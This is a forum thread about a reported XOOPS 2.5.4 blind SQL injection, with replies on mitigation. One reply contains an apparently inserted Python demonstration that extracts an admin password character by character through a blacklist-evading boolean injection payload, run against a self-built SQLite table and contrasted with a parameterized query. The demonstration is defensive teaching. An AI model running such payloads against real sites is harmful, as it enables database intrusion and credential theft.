xoops forums

edipinho

Just popping in
Posted on: 2011/12/27 22:30
Posts: 84
Since: 2003/10/15
#1

Xoops 2.5.4 Blind SQL Injection

Blind SQLI Xoops 2.5.4 Xoops Protector Bypass day 0

I am a layman in this matter; is this really true?

And if it is, how can we avoid the attack?

dbman

Friend of XOOPS
Posted on: 2011/12/27 23:10
Posts: 171
Since: 2005/4/28
#2

Re: Xoops 2.5.4 Blind SQL Injection

Move your data folders outside of the web root and ensure that your host has something like mod_security installed on the web server.
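The thread never shows what the video actually injects, so the following is a generic illustration added here (not XOOPS code, not the Protector rule set, and not the vulnerability from the video) of why a keyword blacklist in front of a concatenated query is the weak part of the picture. A boolean-based blind injection needs no UNION, no SELECT and no comment token: one true/false oracle per character is enough to read a column out of the table the query already touches. The same extraction loop against a parameterized query recovers nothing. The table, rows, blacklist and queries are all constructed for the example.

```python
import sqlite3

# Constructed in-memory stand-in for a CMS users table; not XOOPS's real schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, uname TEXT, pass TEXT)")
    db.executemany("INSERT INTO users (uname, pass) VALUES (?, ?)",
                   [("admin", "s3cr3t"), ("guest", "guest")])
    return db

def passes_blacklist(value):
    """Hypothetical keyword blacklist of the kind generic request filters use.
    Returns False when the input looks like an injection attempt."""
    upper = value.upper()
    return not any(bad in upper for bad in ("UNION", "SELECT", "--", ";"))

def lookup_vulnerable(db, uname):
    # The injection sink: the username is concatenated straight into the SQL.
    sql = "SELECT uid FROM users WHERE uname = '%s'" % uname
    return db.execute(sql).fetchone() is not None

def lookup_parameterized(db, uname):
    # Hardened form: the driver sends the value separately from the statement,
    # so quotes and keywords in uname are just characters of a username.
    sql = "SELECT uid FROM users WHERE uname = ?"
    return db.execute(sql, (uname,)).fetchone() is not None

def oracle_vulnerable(db, uname):
    # Blacklist in front of the vulnerable query, as a filter-style WAF would be.
    return passes_blacklist(uname) and lookup_vulnerable(db, uname)

def oracle_parameterized(db, uname):
    return passes_blacklist(uname) and lookup_parameterized(db, uname)

def extract_password(oracle, db, target="admin", max_len=32):
    """Boolean-based blind extraction: each request asks whether character
    `pos` of `target`'s password has code point `code`; the only signal used
    is whether the lookup returned a row. Stops when no code point matches
    (substr() past the end yields '' and unicode('') is NULL, so the
    condition is never true)."""
    recovered = ""
    for pos in range(1, max_len + 1):
        matched = None
        for code in range(32, 127):
            # Closes the literal, appends the condition, and re-balances the
            # quote with AND '1'='1 so no comment token or semicolon is needed;
            # the column is read from the row the query is already matching,
            # so no SELECT or UNION appears in the payload either.
            payload = "%s' AND unicode(substr(pass,%d,1))=%d AND '1'='1" % (target, pos, code)
            if oracle(db, payload):
                matched = chr(code)
                break
        if matched is None:
            break
        recovered += matched
    return recovered

if __name__ == "__main__":
    db = make_db()
    print("blacklist + concatenation:", repr(extract_password(oracle_vulnerable, db)))
    print("blacklist + parameterized:", repr(extract_password(oracle_parameterized, db)))
```

Running it prints the admin password character by character from the concatenated query despite the blacklist, and an empty string from the parameterized one. The point for the thread: a web-root move and mod_security raise the cost for an attacker, but only the query construction decides whether an injection exists at all.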

edipinho

Just popping in
Posted on: 2011/12/27 23:38
Posts: 84
Since: 2003/10/15
#3

Re: Xoops 2.5.4 Blind SQL Injection

Thanks for the super quick response.
I already do all of this, with the data folder behind the webroot, so am I safe?

Mamba

Moderator
Posted on: 2011/12/28 6:36
Posts: 10308
Since: 2004/4/23
#4

Re: Xoops 2.5.4 Blind SQL Injection

My understanding is that as long as you don't give your Admin access to a hacker, you're safe.

You need to be an Admin to take advantage of this attack.

If you look at the video, you see that he is logging in as an Admin first...

I assume that the Core team will provide a fix for XOOPS 2.5.5, but again - it is a "low level" issue, so no reason for a major worry.
Please support XOOPS & DONATE
Use 2.5.8 | Debug | Requests | Bugs

edipinho

Just popping in
Posted on: 2011/12/28 20:34
Posts: 84
Since: 2003/10/15
#5

Re: Xoops 2.5.4 Blind SQL Injection

Thanks for the reply. I had sensed that he was logged in as an administrator, but as a layman, I thought it was serious.
I always follow your recommendations and have never had any kind of intrusion.

Once again thank you.

wishcraft

Module Developer
Posted on: 2011/12/28 22:12
Posts: 3660
Since: 2007/5/18
#6

Re: Xoops 2.5.4 Blind SQL Injection

I suggest you also run Xortify 3.0. This sort of attack is normally done by a bot, not a person, and the honeypots will be pre-aware of their IP and block them.

Simon
www.ohloh.net/accounts/226400

Follow, Like & Read:-

twitter.com/Cipherhouse
sourceforge.net/projects/chronolabs/
facebook.com/mynamesnot